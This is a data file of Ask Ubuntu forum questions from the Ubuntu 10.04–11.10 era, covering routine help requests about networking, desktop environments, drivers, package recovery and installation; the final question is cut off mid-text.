72819	network is not working nicely	well , i 've got a wired network on my ubuntu 11.10 fresh installation . i can download files and surf the internet . problem is that sometimes it takes much time to load websites and sometimes it gives up trying . i also unsuccessfully tried to connect to an ftp server using filezilla . the same wired network does work fine in a dual-boot installation of windows 7 . please , help me configure my network appropriately . thanks in advance ! some info : paulo @ ubuntu : ~ $ sudo lshw -class network *-network description : ethernet interface product : rtl-8110sc/8169sc gigabit ethernet vendor : realtek semiconductor co. , ltd. physical id : 4 bus info : pci @ 0000:04:04.0 logical name : eth0 version : 10 serial : 00:1d:60:55:58:5c size : 100mbit/s capacity : 1gbit/s width : 32 bits clock : 66mhz capabilities : pm bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=n/a ip=192.168.0.135 latency=64 link=yes maxlatency=64 mingnt=32 multicast=yes port=mii speed=100mbit/s resources : irq:16 ioport : e800 ( size=256 ) memory : febfec00-febfecff memory : febc0000-febdffff
72821	blackmagic intensity pro is a virus . it crash motherboard + pci + usb devices	blackmagic intensity pro is a virus . do not buy this card anymore ? i bought a card and it crashed my whole system . i cant see network anymore getting up . i tested this with : ubuntu 10.04 , 11.04 , fedora , centos , archlinux all the time it crashed my system . i cant boot to my own bios system do not show network or it does not get auto dhcp or no network interface cpu/ram do not function properly has anyone same problem ?
72822	can i install the current version of unity in an older version of ubuntu ?	is it possible to install current version of unity of 11.10 in 10.10 as i 'm fed up with the power issues of current kernel version and would like to revert back . if i revert back to previous kernel 2.6.38 on 11.10 can i solve the power issues and heating issues ? and is it possible to install 2.6.38 on 11.10 ?
72823	reinstalling /var/lib/dpkg	the hard drive on my server that contains /var crashed yesterday . i do not have backups for everything in /var/lib . regarding the list of packages installed , i have a backup file using the following command from the day of the crash : dpkg-query - show - showformat = ' $ { package } \ n' how to reset apt and dpkg settings to be able to re-install and update the system ? any ideas would be appreciated .
72834	ca n't decrease/increase brightness on samsung np300v3a more than 1 step	i just installed oneiric on a samsung np300v3a ( series 3 ) laptop . everything seems to work fine more or less except one thing : i ca n't reduce screen brightness more than 10 % or so . fn+f3 ( brightness up ) sets brightness to 100 % and fn+f2 ( brightness down ) sets it to about 90 % or so . no matter how many more times i press it , it does n't fall below that . for a video card i have an integrated intel hd graphics 3000 chipset , but that 's probably unrelated to the issue . what can i do to solve this ?
72836	how to fix inconsistent number of rows in unity-2d	in unity-2d , i only have one row of workspaces when i switch with ctrl+alt+arrow , but two when i hit meta+s . is there a way i can get two rows in both ?
72837	ubuntu one folder opens with movie player	i 've upgraded to 11.10 and now almost everything opens with movie player instead of in folder : waste basket , ubuntu one folder , mobile phone when connected etc.what 's the remedy ? it 's highly inconvenient if not simply annoying .
72838	is there a way to unmask the login password in unity ?	i use two different keyboard layouts and i never know which one i 'm in at the login . the keyboard layout indicator at the login always says usa whether i 'm in qwerty or programmer dvorak . i have no need for the extra security of password masking . i 'm using natty . i plan on upgrading soon .
72842	how do i install software ?	i am new to ubuntu and i was wondering if anyone could show me a tutorial or actually show me how to install software , for example browsers or things like that . thanks
72844	`` error getting a request token : bad request '' when setting up online accounts	i have just installed 11.10 version and i can not setup my online account . i installed gnome do and contacts but i am having problems about the online account . i got the error message below : error getting a request token : bad request
72848	dual boot 10.10 and 11.10 - no grub	i installed ubuntu 11.10 alongside existing 10.10 . i expected to get a menu on startup to choose which version to start with . it booted straight into 10.10 and i did n't get the option of 11.10 at all . how can i get the menu at startup ?
72849	looking for clearlooks for gtk-3.0 or something similar	i am looking for a theme that replicates the look of the classic clearlooks theme from gtk2 or something that at least looks similar , i.e . something basic , with rounded corners that does n't overdo it with distracting color gradients . having the arrows on the scrollbar would also be nice . suggestions ?
72850	can i downgrade compiz ?	i 'm just wondering if it is possible to downgrade compiz to maverick 's version 0.8.6 like in natty ? i have an ati radeon mobile 3200/4330 dual gpu and the new compiz and even natty 's compiz does n't like my laptops card . i understand downgrading will loose unity 3d but i will still have 2d .
72851	terminal emulators like cathode ?	this is cool : http : //osxdaily.com/2011/01/27/the-ultimate-retro-terminal-cathode/ are there any similar applications for ubuntu ?
72852	ruby 1.9.1 rvm install fails	i am trying to run this command to get ruby 1.9.1 working on my system : rvm install 1.9.1 it says `` error running make '' and when i cat the log file this is the compile error i am getting : gcc -i . -i../../.ext/include/x86_64-linux -i../.././include -i../.././ext/openssl -druby_extconf_h=\ '' extconf.h\ '' -fpic -o2 -g -wall -wno-parentheses -fpic -o ossl.o -c ossl.c ossl.c:118:1 : error : unknown type name ‘stack’ ossl.c:119:1 : error : unknown type name ‘stack’ make [ 1 ] : *** [ ossl.o ] error 1 make [ 1 ] : leaving directory `/var/cache/ruby-rvm/src/ruby-1.9.1-p431/ext/openssl' make : *** [ mkmain.sh ] error 1 so whats up with this ? how do i get ruby 1.9.1 working under ubuntu 11.04 ?
72853	why does it take so long for ubuntu to say `` command not found ''	for some reason , with my setup , it can take ubuntu several seconds to respond with `` command not found '' when i accidentally typo a command . why does it take so long ? is there any way to shorten the period of time i have to wait ? i do have 13 directories in my path , but even so ( most of them have just a few files in them ) , it should n't take several seconds to search 13 directories for a command right ?
72854	system in indeterminate state -- what is the comprehensive list of packages i should have ?	i have messed something up with packages . trying to fix an x11 problem in ubuntu 11.10 , i 've done several package additions and removals , that each pulled some combination of dependencies with them . i do n't know what 's supposed to be on my system , but as i keep trying to troubleshoot errors from screenshots not working , to 3d problems , to limitations of the number of desktops i have , to touch screen problems , i keep finding that important packages are still missing from my system , despite the fact apt-get says everything is fine . where can i find a comprehensive list of what ought to be installed on my system for ubuntu 11.10 , so i can just sudo apt-get the whole darn thing ?
72859	how to interpret this screenshot error for gnome-screenshot ?	this is the error when i type gnome-screenshot : $ gnome-screenshot ** debug : the getprofileforwindow request failed : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.colormanager was not provided by any .service files i installed gnome-color-manager , but that did n't fix the problem ( i still ca n't take screenshots , and still get this error ) . all the search results i saw recommended changing xorg.conf , but i only have an xorg.conf.failsafe file , not an xorg.conf file .
72860	upgrade ubuntu without getting a ton of new software installed	was asked to upgrade ubuntu to version 11.10 today , and said alright . when it 's asking me if i want to start the upgrade it lists some details . it says that 434 new packages are going to be installed . one is for example aisleriot , solitaire card games . i do not want that on my system . i spent a lot of time uninstalling a lot of applications like that . is there a way i can tell ubuntu to upgrade , without bringing with it a ton of extra packages that i do n't want ?
72861	why are my videos playing speeded up with no audio , but work fine if i log in as a guest ?	since the start of this week i have been experiencing a glitch in the multimedia on my samsung r518 laptop . i have 2 problems : videos in every player are speeded up around 2 or 4 times ( including youtube.com ( both html5 and flash variants ) , any other video on the web and videos on my laptop played by totem media player ) , exception is vlc player , but 2nd problem does concern even that . there is no sound - simple as that ( with or without headphones plugged in ) . these all problems are now , and has not seen before , i upgraded to ubuntu 10.10 after it was possible , and from start i did n't have anything from this - it just started in this week . i have n't even putted new software in . i have more or less solved the question ( kind of ) - i just logged in as a guest - and it all works , but when i make a new user - it does not . please help me . some stats below : sudo lshw -c sound *-multimedia description : audio device product : rv710/730 vendor : ati technologies inc physical id : 0.1 bus info : pci @ 0000:01:00.1 version : 00 width : 32 bits clock : 33mhz capabilities : pm pciexpress msi bus_master cap_list configuration : driver=hda intel latency=0 resources : irq:48 memory : cfeec000-cfeeffff *-multimedia description : audio device product : 82801i ( ich9 family ) hd audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 03 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=hda intel latency=0 resources : irq:47 memory : fc200000-fc203fff sudo lshw -c video *-display description : vga compatible controller product : m92 lp [ mobility radeon hd 4300 series ] vendor : ati technologies inc physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:46 memory : d0000000-dfffffff ioport:2000 ( size=256 ) memory : cfef0000-cfefffff memory : cfe00000-cfe1ffff
72867	help fixing virtual console ( tty1-6 ) under virtualbox	i updated my ubuntu from 10.4 to 11.10 . ( huge mistake , i know . ) i am unable to view my virtual consoles ttys1- ttys6 this happens inside virtualbox and gdm is running in background . i 'm not sure what caused this issue . and i 'm not sure why it 's persistent . here is a picture of it : thats ttys1 , you can barely see it . thanks for your time . btw , this problem occurs with fresh install of 11.10 on virtualbox too .
72868	pulseaudio/flash overloading cpu	my laptop fan has now been going full throttle for 10 minutes ( not unusual ) and top shows : pid user pr ni virt res shr s % cpu % mem time+ command 1565 user 9 -11 295m 7044 4368 s 73 0.2 4:59.45 pulseaudio 2016 user 20 0 347m 73m 18m s 53 1.8 20:27.41 npviewer.bin 1543 user 20 0 535m 18m 12m s 13 0.5 0:40.12 gnome-settings- 1911 user 20 0 1125m 491m 37m r 9 12.4 10:47.62 firefox 1660 user 20 0 329m 6796 5324 s 8 0.2 0:24.19 indicator-sound 967 root 20 0 168m 43m 17m s 1 1.1 6:22.52 xorg 1555 user 20 0 630m 179m 43m s 1 4.5 3:02.22 compiz 1646 user 20 0 300m 8428 6668 s 1 0.2 0:00.60 indicator-datet 1520 user 20 0 27488 3108 864 s 0 0.1 0:09.65 dbus-daemon 1739 user 20 0 335m 9236 7172 s 0 0.2 0:00.37 e-calendar-fact 2330 user 20 0 311m 16m 11m s 0 0.4 0:03.06 gnome-terminal the reason is i have a flash video loaded and paused . i 've had a few mysterious freezes where i had to alt-sysrq-reisub , which i suspect are due to overheating . after 10-15 minutes the cpu usage goes down to 0-1 % on pulseaudio , and the fan goes back to normal . i 've stopped using chromium for hd video , and just play 480p in firefox , because of this cpu usage . the sound in flash is buggy and somewhat lagged , as described in this previous question : adobe flash player bug after upgrade to 11.10 but this extreme behaviour of pulseaudio is rather destructive and new to ubuntu 11.10 . it feels almost like an infinite loop , hogging almost all system resources . my specs : i am running 11.10 in wubi on a laptop ( winxp ) that is a few years old ( same year vista came out ) . intel core2duo t9300 2.5ghz 800/6m box 2 x kingston 2gb 667mhz ddr2 non-ecc cl5 sodimm chipset intel gm965 processor intel速 core 2 graphics card nvidia geforce go 8600m gt graphics card memory ( max ) 512 mb
72869	how can i stop gksudo nautilus from changing the wallpaper ?	running gksudo nautilus in the gnome shell changes my wallpaper from the gnome 3 stripes background to ubuntu 's warty final default background . i 'm pretty sure this is related to root nautilus managing the desktop , but since i 've recently upgraded from 10.04 and skipped 11.04 , i 'm unsure about what gnome uses for settings now between dconf , gconf , etc , so i do n't know where i can edit the setting to stop this . any help would much appreciated .
72870	can not login to ubuntuone since upgrade to 11.10	when i start ubuntuone on 11.10 with the same id and password i used to have in ubuntu 11.04 this error message appears : method `` createitem '' with signature `` a { sv } ( oayay ) b '' on interface `` org.freedesktop.secret.collection '' does't exist and i can not sign in or connect anyway . i heard there are some bug fixed having been released , but i do not know how to use them . can anyone help , please ?
72871	view the folder of a selected file in the dash	when browsing files in the dash and i click a file it opens the file . is it possible to instead choose to view the folder of the file in nautilus ? if , how ? here 's an example to clarify . i want to rename a file that i worked on yesterday . i open the dash and view earlier files . there i find the file but the only possible choice seems to be to open the file . what i would like to is to view the folder of the file in nautilus so that i may rename it via nautilus .
72873	how do i reset my authentication password ?	i accidentally forgot my authentication password and i do n't know what to do . please help me out with this problem . i cant download anything .
72879	add second processor to virtualbox virtualized 32bit ubuntu	i have an ubuntu 32bit virtualized machine for some time now on my 4 processor server . i gave it one processor but now i need more power . i added the second in virtualbox settings but virtualized ubuntu still thinks it 's only one processor : cat /proc/cpuinfo processor : 0 vendor_id : genuineintel cpu family : 6 model : 15 model name : intel ( r ) core ( tm ) 2 quad cpu q6600 @ 2.40ghz stepping : 11 cpu mhz : 2405.790 cache size : 6144 kb physical id : 0 siblings : 1 core id : 0 cpu cores : 1 apicid : 0 initial apicid : 0 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 5 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx lm constant_tsc up pni ssse3 lahf_lm bogomips : 4811.58 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management : is there a way to make my virtualized ubuntu machine aware of a second processor ?
72883	ubuntu one does not sync	i have ubuntu installed in several pc 's . my last install is of the 10.04 version . ubuntu one does not sync . i have tried to completely remove and reinstall ubuntu one , to delete the password for ubuntu , to delete the .local/share/ubuntuone folder . nothing happens ubuntu one can not see the other devices with whom it should connect , it tries to sync but fails , the status remains all the time unknown . i really do not know what to do
72885	what ubuntu tweaks , hacks , or modifications could n't you live without ?	what ubuntu tweaks , hacks or modifications do you find indispensable ? it could be gnome2 or gnome3 based ubuntu . rules : mention ubuntu version ( if not general tweak ) include a short `` how-to '' include a link of original content ( from forums , blogs , websites ) , if possible .
72886	how do i get the touchscreen pointer driver working on a panasonic cf-19 toughbook ?	the only instructions i have managed to find in google are related to ubuntu 8.04 - while mine is 11.10 . have anyone managed to get it solved out ? https : //wiki.ubuntu.com/cf-19
72888	how can i enable the power button on my server ?	the power button on my headless 11.10 server appears to do nothing unless i hold it in for 5 seconds or so , in which case it switches the machine off instantly . what i 'd like it to do if i press it briefly is a normal shutdown ( shutdown -p now ) . how can i allow this ? i have seen this question but it is for desktop installations .
72894	background process ( nohup & ) suspends/resumes when user logs out/logs in	ubuntu server 11.10 when a normal ( non-root ) user starts a process with nohup ( nohup java ... & ) , when the user disconnects from the terminal ( ssh ) the process stops responding . when the user connects again , the process starts responding again . for example the process is a database ( h2 ) which stops responding queries when the user that started the process disconnects from the terminal , and starts responding again when the user logs in again . is there any background process permissions that i 'm not aware of that precludes the process from running in background ? what could be causing this behaviour ?
72902	disable interactive ssh at user-level	i connect to a server i do n't control via ssh . i use public key access and do n't need to be able to connect with a keyboard-interactive password . i would like to disable keyboard-interactive access to my user so that there is no way for others to hack in this way . since i do n't control the server , is there a way to set up my user 's config file to prevent keyboard-interactive access ?
72908	how to make a input method for my conlang using m17n ?	i would like to make a input method for my conlang zɪ̀ŋ . how would i go about doing this ? i made one on my macbook using ukelele . might there be a tool like this ? i want it to work like this , when i type : ie1 ɪ̄ ie2 ɪ́ ie3 ɪ̌ ie4 ɪ̀ o1 ō o2 ó o3 ǒ o4 ò i1 ī i2 í i3 ǐ i4 ì dz ʣ ts ʦ dʒ ʤ tʃ ʧ ng ŋ ̤θ θ̤ ̤w w̤ ` and so on . i use a bit of the ipa character in this language
72909	unable to enable mobile broadband on a zte ac2726	i upgraded from ubuntu 11.04 to 11.10 and from then i am not able to enable mobile broadband . i was able to use it perfectly in ubuntu 11.04 . when i insert my usb modem it detects perfectly but shows `` not enabled '' even after enabling mobile broadband . i have also edited my connection and have put username and password correctly .
72910	deja dup folder sync	after doing my first deja dup backup to my ubuntu one service i noticed the folder show up in the list of folders to sync with my device . should i sync this folder , why and/or why not ?
72916	no internet access when i 'm connect to my company 's vpn	i googled my problem and i 've read some questions in ask ubuntu , but i did n't solve my problem . i connect to a pptp vpn server and it works well , but when i 'm connected to that vpn i do n't have internet access but private network access . if i check `` use this connection only for resources on its network '' , i have internet access , but this way i have n't access to my company 's private network . what 's the problem ? help , please .
72918	why does my hardware wifi switch turn off my usb wifi key as well as the wifi card ?	my hardware wifi switch button does n't work very well . sometimes it works , sometimes not . so i 've bought a usb wifi key , and it works very well . but there is still a problem , if i touch the wifi button both the wifi card and the usb stop working and i lose my connection . i 've seen a lot of threads about this problem but i still have n't found a solution . i 've already seen that the usb wifi actually does n't became hardware blocked . this is the output from rfkill list command run with the hardware switch on and then off : switch on rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : no 2 : phy2 : wireless lan soft blocked : no hard blocked : no switch off 0 : phy0 : wireless lan soft blocked : no hard blocked : yes 2 : phy2 : wireless lan soft blocked : no hard blocked : no clearly the built in wifi card is phy0 . phy2 seems to be my usb card but i do n't think that the problem is from rfkill . i think is something with ubuntu that makes it think that if i disable my wireless connection it 's because i do n't want to use wireless at all . if somebody knows how to make my wifi usb card not turn off when the hardware switch is turned off please let me know .
72919	music purchased , but it was never put in my files on ubuntu 's server	i purchased the following music on the following date ( see cofirmation # below ) , and it was never added to my files for download . please advise and make the files available . your order : +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ receipt various - the lost notebooks of hank williams $ 9.99 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ order number : 20129810 order date/time : 21/10/2011 18:02:25 email : *** @ *** payment via : visa discount : price : $ 9.99 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
72920	is there a better way to redact a pdf ?	i had to print a couple of pdfs recently to send to someone , but i wanted to redact ( black out ) a couple small bits of text . a quick google search did n't turn up any tools for this specific purpose , so i fell back to imagemagick & gimp : convert document.pdf document.png gimp document-0.png ( use paintbrush to black out text ) print redacted page from gimp print remaining pages from xpdf the problem with this strategy is that the conversion process ( from pdf to png or whatever other format ) loses quality . i tried editing the pdf in gimp but it did n't work right away . is there a specific tool that permits redaction in this way ? ( it does n't even need to be `` real '' redaction -- i 'm not sending a softcopy so `` fake '' redaction will work because the hardcopy ca n't be hacked to reveal the underlying text . ) or , is there a trick to being able to edit pdfs in gimp ?
72923	kde 4.7 - plasma netbook - change the top panel to autohide	does anyone know how to set the top panel in plasma netbook not to autohide ? i am aware this can easily be done with plasma desktop ( by clicking the `` cashew '' and then `` more settings '' ) . however it appears the same option is not available under plasma netbook .
72925	what is button5 ?	i want to record my desktop and use zoom function . i changed zoom in shortcut to < super > button5 and when i click windows logo and scroll my mouse , it does n't work . what i am doing wrong ?
72927	missing system menu in ubuntu 11.10	i recently updated to ubuntu version 11.10 . i left in the middle of the install and came back to a page asking about removing old packages and updating them . i could n't click on anything and ended up having to do a hard shutdown . when i rebooted , the new version came up in the boot menu . it 's running mostly fine , but i missing the system menu ( the little cog/circle in the right hand side on the tool bar ) . sometimes the menu is completely missing and sometimes the icon is missing , but i can mouse over far enough to get the menu to open . since the problem started on the packages page , i used apt-get update and apt-get upgrade . that went through and updated all the packages but now i 'm still missing the menu . i have n't changed any of the settings from the basic install and i ca n't boot into old versions of ubuntu ( even after selecting them on the boot menu ) , i just end up booting into 11.10 . changing the screen settings does n't change anything either . help ? !
72934	shutdown/reboot ( occasionally ) freezes	my computer would occasionally freeze when i shutdown or rebooted the computer for whatever reason . as of late , every time i shutdown or restart it freezes and now it 's becoming a pita . i have no idea how to debug this and really need some help : ( .
72935	configure kate ( kde ) dialog window shortcuts under gnome3 ?	i use kate under ubuntu 11.10 . i want to assign cnt+h for toggle hidden files in dialog windows ( open/save file , etc ... ) and remove the default . this shortcut can not be configured in the kate shortcuts dialog , and system settings for kde does not provide the keyboard and mouse dialod that comes with kde in kubuntu
72938	item properties is showing size in bytes with commas	why nautilus , while showing the size of a file in bytes is using commas ? example 739.5 kb ( 739,530 bytes ) until 11.04 it was just a clean number ... example 739.5 kb ( 739530 bytes ) is it possible change it ?
72940	how can i access my http site ( non-apache ) through https ?	i 'm using the open source motion cctv/webcam software to allow me to view my camera live over a network . internally , i can go to my web browser , type in the url which is something like http : //nameofmyubuntuserver:8081 . that will take me to my camera 's live feed . now i could port forward that to access it remotely , but there 's the potential of someone seeing that address by something like analysing packets . is there any way to secure that address ? i 'm running motion on ubuntu server 11.04 . preferably i 'd like to make it go through https as well as prompt for a password . i found this but it seems so complex . is there an ubuntu package which can allow me to access that address after authenticating myself and encrypting the connection ? it does n't even have to be motion-specific . i 'm just looking for an easier way to encrypt and authenticate a locally-hosted http site . or even better , an ubuntu package that creates me a new website with authentication and https ( preferably something simple , apache scares me ) , which then redirects to my local site in a secure manner ?
72946	how can i find application indicator id 's ?	i want to change the display order of several apps in the top panel of ubuntu 11.10 ( logging into unity 3d ) but i am amazed that there appears to be no easy way to do this . however , i have read that the following file controls the display order : /usr/share/indicator-application/ordering-override.keyfile further details here : http : //www.webupd8.org/2011/06/how-to-change-application-indicators.html at present i have the following top-panel apps installed : radio tray my-weather-indicator choqok ( a twitter client ) system monitor indicator classicmenu indicator in order to carry out the steps in the above link i need to know the correct application indicator id for each of the above apps . how can i find these ?
72953	how can i get swftools installed ?	when i run sudo apt-get install swftools i am told e : unable to locate package swftools . how can i get swftools installed ?
72956	find what package supplied a tool / application in ubuntu 11.10	when you type a command in the terminal in ubuntu that you have not installed but can supplied by a package ubuntu will suggest the package to be installed . how do i do the other way around ? how do i look for what package supplied the command i am typing in a terminal ? dpkg -s /usr/bin/termit returns termit : /usr/bin/termit apt-file find /usr/bin/termit returns termit : /usr/bin/termit where termit is an terminal emulator supplied by package termit .
72957	file / application association using a custom command is gone ?	in previous ubuntus when you want to select/change an application to open a specific file ( right-click/open with other application or properties ) you were able to write a custom command to open the file . this was very useful , but now in 11.10 i ca n't find this option , it only shows me a list of applications and a button to look for applications in internet . is there a way to restore the command line to write custom commands to open files ?
72958	ca n't install inkscape	i tried to install several packages older ones too.tried to upgrade it from terminal , to compile it.once i did it and wait it for long time , but at the end of instalation it showed me 2 errors.when i 'm trying to run it from terminal with sudo inkscape i 'm getting this message . inkscape : error while loading shared libraries : libgtkmm-2.4.so.1 : can not open shared object file : no such file or directory i tried to download inkscape with synaptic and ubuntu center too.inkscape is awesome graphic tool , but i do n't see how i could make it to work on ubuntu 11.10.thanx in advance .
72961	how to restore original thunderbird icon theme	with ubuntu 11.10 , a dark-mono thunderbird icon theme has been introduced . as i prefer the original in-app icons , i would like to ask , how to restore them .
72964	how can i install a realtime kernel ?	i have read a lot of threads with similar questions , but after reading the answers , i am very confused . i have found in them lots of url 's with repositories but people discusses about which repositories are made for one or two versions of ubuntu , but i have found nothing about 11.10 version . is too soon to ask for that ? should i downgrade my ubuntu to have a realtime kernel ?
72966	where is the leave message button in the lock screen ?	i have recently installed ubuntu 11.10 , and i noticed there is no `` leave message '' button while my screen is locked . is it removed , or it 's just a bug ? is there any way to bring it back ?
72969	will it be possible to upgrade to the latest ubuntu from an older version	is it possible to upgrade for example from ubuntu 9.10 , 10.04 or even 10.10 to the latest version of ubuntu ( 11.10 in this case ) . am not asking to download the dvd/cd or to upgrade from one version to the other until you get to 11.10 . i want to know if an older can upgrade from 9.10 directly to 11.10 or something like this . and of course if yes or no , has this been thought about in any talks like a way to make it so that users have it easier to upgrade to the latest version in cases where it could not be done for a long time ( like moving around the world for 2 years with ubuntu 9.10 and then coming home and looking at unity in 11.10 ) . info - i know this 2 already exist : how to upgrade effortlessly from ubuntu 10.04 to ubuntu 11.10 on the same machine is it possible to upgrade straight from 10.04 to 11.04 ? if the answer is still no , maybe more information about if any talks have been made to this kind of work or idea .
72974	why is my laptop cutting out after installing a larger battery ?	this is a recurring problem i have had for some time . around a year ago i installed a larger capacity battery ( the kind that sticks out the back ) , on my hp 6715b laptop . when running on battery power under ubuntu , the laptop sometimes randomly just cuts out . it happens more frequently , when laptop is drawing more current , e.g . when there are several things plugged into the usb , or running full screen video with the screen brightness up . after it cuts out the laptop wo n't boot back up again until plugged into the wall , as though all the charge has been drained from the battery , even if the battery was on almost full before failing . the question is : is this a problem with the battery ? it was off the internet , but what seemed like a reasonably reputable seller . the stickers on the battery have the hp logo , and it looks genuine . is it a problem with ubuntu ? it has never happened while running windows ( i dual boot ) , but i do n't run windows very often so this could just be luck . is it a problem with my laptop hardware ? and most importantly how can i find the answers to the questions above ? any pointers of help would be welcome . background wise i 'm running 11.10 at the moment , but the problem was present also under 11.04 ( and i think 10.10 too ) .
72977	how can i correct for color blindness accessibility with a compiz color filter ?	i want to be able to correct for red-green color blindness like in the gnome-mag applet , but i also want to use compiz , which does n't allow for the color switching that gnome-mag provides ( try it ) . in the compizconfig settings manager , there is a color filter plugin that simulates deuteranopia and protonopia for normal sightedness people but i want a color filter that goes in the `` opposite '' direction . where are some filters for compiz that accomplish this ?
72978	what could cause `` normal '' ubuntu not to work but ubuntu-2d to work ? 11.10	i messed up my xorg somehow and now unity-3d does n't work , but unity-2d seems ok. by does n't work , i mean that when i boot into 3d , i only see a background image , no icons , panels , or anything else . what are the most likely suspects for why this would be the case ? i would like to get 3d back to the way it was before i messed up my xorg ( or whatever i messed up ) , and am looking for configuration files i could reset , or packages i could reinstall .
72982	disable ati radeon hd 6950 in ubuntu , not in bios ?	i have the radeon hd 6950 which have very poor linux support . instead of running unity 2d or any other , i would rather use my old 8800gts which works great , and then disable the 6950 since i only need the 6950 for gaming in windows anyways . so my question ; in windows i can disable the 8800 gts in the device manager , but how do i do the same thing in ubuntu , just for the 6950 . i have read about hybrid graphic cards in laptops , but i do n't think this is the same thing .
72984	what is the difference between using system monitor and terminal to kill a process ?	when i shutdown my minecraft it never closes all the way , i have looked for a solution but found none . after awhile i gave up and decided that i would manually kill it when i wanted to close it . if i use pgrep then kill in the terminal it seems to have no affect , but when i open the system monitor and right click and kill it , it shuts down nicely . what are the differences between the system monitor way and the terminal way ? does the system monitor do something else in the background that the kill command does not ?
72989	how to share my wifi internet via wifi ?	i am connecting to a wifi network through my laptop in ubuntu . now i need to share my internet connection with my wife 's netbook because her netbook is not able to connect to that wifi network directly , because of its weak signal . how can i do that in ubuntu ?
72990	power managements/settings problem with ubuntu 11.10	i have acer 722 netbook with c-60 apu 1ghz and amd 6290 graphics . i upgraded my 11.04 to 11.10 and there are less functions in power managements , i have no control when my machine sleeps , hibernate , no brightness control , etc . another problem is that whenever i unplug my machine ( at any battery level ) , it would prompt battery low , machine will hibernate . is there a way to fix this ? is there a better power managements option ?
72991	how to make pcmanfm to display the column `` permissions '' in detailed view - lubuntu 11.10	i decided to try lubuntu after my problem with wireless on lenovo u165 . i did not know my netbook is so fast : ) ! great performance . however i miss some things from nautilus . i searched but did not find anywhere help how to add `` permissions '' column in detailed list view . thanks in advance .
72993	how to curve the edges of menus ?	i want to know if this is possible . like the menu when you right click , if the edges can be curved . i do n't like to see the square appearance .
72998	drag and drop unity dash 11.10	why is dragging and dropping applications in the ubuntu 11.10 unity dash so laggy ? it was n't like this in 11.04 .
72999	how can i test if ubuntu activated hyperthreading ?	i have the feeling that hyperthreading is not activated on my pc . i took a look into /proc/cpuinfo and there is described that siblings has the same number than cpu cores . this means that hyperthreading is not activated . how can i activate it ? part entries of /proc/cpuinfo : processor : 0 vendor_id : genuineintel cpu family : 6 model : 23 model name : intel ( r ) core ( tm ) 2 duo cpu e8400 @ 3.00ghz stepping : 6 cpu mhz : 2997.000 cache size : 6144 kb physical id : 0 siblings : 2 core id : 0 cpu cores : 2 apicid : 0 initial apicid : 0 fpu : yes fpu_exception : yes cpuid level : 10 wp : yes
73007	ca n't set a higher screen resolution in a external display in a dell mini 10v laptop	i have a 22 '' display from hp ( w2207h ) connected to my laptop ( a dell mini 10v or 1011 ) through a vga switch ( a share this screen with a desktop computer and a nintendo wii ) . my problem is that i ca n't set a higher resolution than 1024x768 ( 4:3 ) in my external display . i can only set a lower resolution ( 800x600 and 4:3 ) . i used it before with ubuntu and i had no problem with the screen resolution so i think the problem is the vga switch . does anybody knows how to fix this problem ? does anybody knows how i can start ? this is a screenshot of my screen configuration . the green one is the hp display and the word you can read on it is `` unknown '' . yes , it 's in spanish . thank you very much . more information : the graphic adapter of my dell mini laptop is intel945gse uma .
73011	ubuntu one for windows phone 7	are there any plans to provide an ubuntu one client for windows phone 7 ? i realise that it 's not the most popular mobile platform , but there are people ( including me ) who would find it useful .
73017	thunar as default file manager in lubuntu 11.10 - how ?	pcmanfm misses the permission column in its detail view and the ability to set viewable columns . because of this i switched to thunar . now i want to set it as my default file manger in lxde . how to do this ?
73027	after upgrading to ios 5 ipod is not detected by ubuntu 10.04 anymore	i updated my ipod to ios 5 and now ubuntu 10.04 does not even mount it anymore , the version of libimobiledevice is 1.0.6-1 , and i also tried the unpair/pair routine but it did not fix my problem , can anyone help ?
73029	photorec not seeing sd memory of camera	i am trying to recover pictures form a friends sd memory camera . when i connect the camera and run photorec it is not seeing the camera as a drive for me to recover files from . it only shows my hard drive . is there anyway i can force it to see my camera ?
73030	can i get unity-style super+ [ 1-9 ] keyboard shortcuts for launching apps in gnome shell ?	i 'm trying out gnome shell instead of unity to see if i like it better , and the unity feature that i miss most is the ability to switch to specific applications using super+ any number from 1 to 9 . is there any way to add this feature to gnome shell ? i could add custom shortcuts using the gnome shell system settings , but those shortcuts would always launch new windows instead of switching to existing ones .
73033	need help to install ubuntu on win7 alienware m17xr3 , installing not working	please i need help to install linux on my computer to start analyzing next generation sequencing ( molecular genetics ) for my work . i 've tried to install from all different ways and forms and it gave me different errors . first i will describe my system : alienware m17x r3 raid drive 596gb ( 2x 298 gb ) windows7 primary partition c : the hardrive is divided in 3 primary partitions ( ca n't do 4 do n't know why ) 1st : fat16 no name capacity 40mbs almost not used ( has files like command.com , dellbio.bin , dellrmk.bin and oobedone.flg ) i dont know what this is for but is blocked and non system ( status : none ) . 2nd : recovery ntfs 9gb ( status : system ) and it seems to have boot files . 3rd : cd : windos os ( status : boot ) . and i have 2 logical drivers f : data for backup and games : d ( 300gb ) g : for trying to install the linux ( already tried with fat32 , ext2 , ext3 and ext4 ) installing with wubi on f : and g : instalation looks good on windows ask to restart dos mode appears : try ( hd0,0 ) non-ms : skip try ( hd0,1 ) ntfs5 : no wibildr try ( hd0,2 ) ntfs5 : error : `` prefix '' is not set . installing with wubi on c : installation looks good on windows ask to restart dos mode apears : mount denied becouse ntfs volume is already exclusive opened , the volume may be already mounted or another software may use it which could be identified for example by the help of the 'fuser ' command mount devdm-4 could not find installation files /ubuntu/install custom-installation run 'chkdsk /r ' on windows and restart ... blablablalba ... that should correct . done this did n't work . tried installing with usb drive and after burning a cd with the 